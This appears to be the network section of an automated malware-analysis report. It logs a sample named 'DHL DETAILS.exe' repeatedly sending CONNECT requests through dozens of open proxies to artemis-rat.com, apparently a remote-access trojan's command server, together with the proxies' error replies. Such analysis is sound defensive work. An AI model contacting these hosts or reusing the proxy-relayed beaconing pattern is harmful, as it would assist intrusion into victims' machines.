                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 68 65 6c 70 40 67 65 6e 69 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66 20 74 68 65 20 74 69 6d 65 20 74 68 69 73
                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at help@geninetworks.com to inform them of the time this


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    411192.168.2.551226160.16.90.3531286352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.628861904 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:14.301820040 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:14.690685987 CET39INHTTP/1.1 200 Connection established


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    412192.168.2.55128151.20.50.14931286352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.639390945 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:13.962296009 CET116INHTTP/1.1 200 OK
                                                                                    Date: Sat, 09 Mar 2024 12:14:13 GMT
                                                                                    Server: nginx
                                                                                    Content-Type: text/plain
                                                                                    Content-Length: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    413192.168.2.551242185.219.133.10631286352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.646337986 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:14.026469946 CET327INHTTP/1.1 400 Bad Request
                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                    Date: Sat, 09 Mar 2024 12:14:13 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 166
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    414192.168.2.551364104.25.135.170806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.649225950 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:13.803910017 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:13 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    415192.168.2.551293173.249.29.24391236352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.675312042 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:13.987941980 CET536INHTTP/1.1 503 Service Unavailable
                                                                                    Server: squid/3.5.27
                                                                                    Mime-Version: 1.0
                                                                                    Date: Sat, 09 Mar 2024 12:14:13 GMT
                                                                                    Content-Type: text/html;charset=utf-8
                                                                                    Content-Length: 3832
                                                                                    X-Squid-Error: ERR_DNS_FAIL 0
                                                                                    Vary: Accept-Language
                                                                                    Content-Language: en
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 37 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45
                                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2017 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>E


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    416192.168.2.550130167.86.69.142422146352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.677769899 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:16.676991940 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:19.677496910 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:25.677100897 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:37.677826881 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    417192.168.2.55119890.188.250.16806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.678859949 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    418192.168.2.55130595.164.89.12388886352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.691836119 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:13.993149996 CET327INHTTP/1.1 400 Bad Request
                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                    Date: Sat, 09 Mar 2024 12:14:13 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 166
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    419192.168.2.550162185.217.136.6713376352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.692189932 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:16.723846912 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:19.724391937 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:25.833190918 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:37.834142923 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    420192.168.2.551113117.160.250.163816352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.692282915 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:14.234915972 CET221INHTTP/1.1 403 Access Denied
                                                                                    Date: Sat, 09 Mar 2024 12:14:14 GMT
                                                                                    Connection: close
                                                                                    Cache-Control: no-store
                                                                                    Content-Type: text/html
                                                                                    Content-Language: en
                                                                                    Content-Length: 43
                                                                                    Data Raw: 59 6f 75 20 61 72 65 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 20 74 6f 20 61 63 63 65 73 73 20 74 68 65 20 64 6f 63 75 6d 65 6e 74 2e
                                                                                    Data Ascii: You are not allowed to access the document.


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    421192.168.2.550280162.241.46.40643536352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.705023050 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:16.723880053 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:19.724389076 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:25.833209038 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:37.834142923 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    422192.168.2.55132360.246.122.244806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.713505983 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    423192.168.2.551355184.170.245.14841456352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.713689089 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    424192.168.2.550189178.128.207.96188776352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.714865923 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:16.781192064 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:19.915770054 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:25.974036932 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:37.974257946 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    425192.168.2.55127689.218.8.15210806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.722755909 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    426192.168.2.55026852.151.210.20490006352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.727560043 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    427192.168.2.550156154.236.189.719766352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.730643034 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:16.723865986 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:19.724390030 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:25.833208084 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:37.834141016 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    428192.168.2.55124860.12.168.11490026352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.736239910 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:14.169042110 CET311INHTTP/1.1 400 Bad Request
                                                                                    Server: nginx
                                                                                    Date: Sat, 09 Mar 2024 12:52:47 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 166
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    429192.168.2.551287103.83.232.122806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.738615036 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:14.115124941 CET343INHTTP/1.1 400 Bad Request
                                                                                    Server: nginx/1.14.0 (Ubuntu)
                                                                                    Date: Sat, 09 Mar 2024 12:14:13 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 182
                                                                                    Connection: close
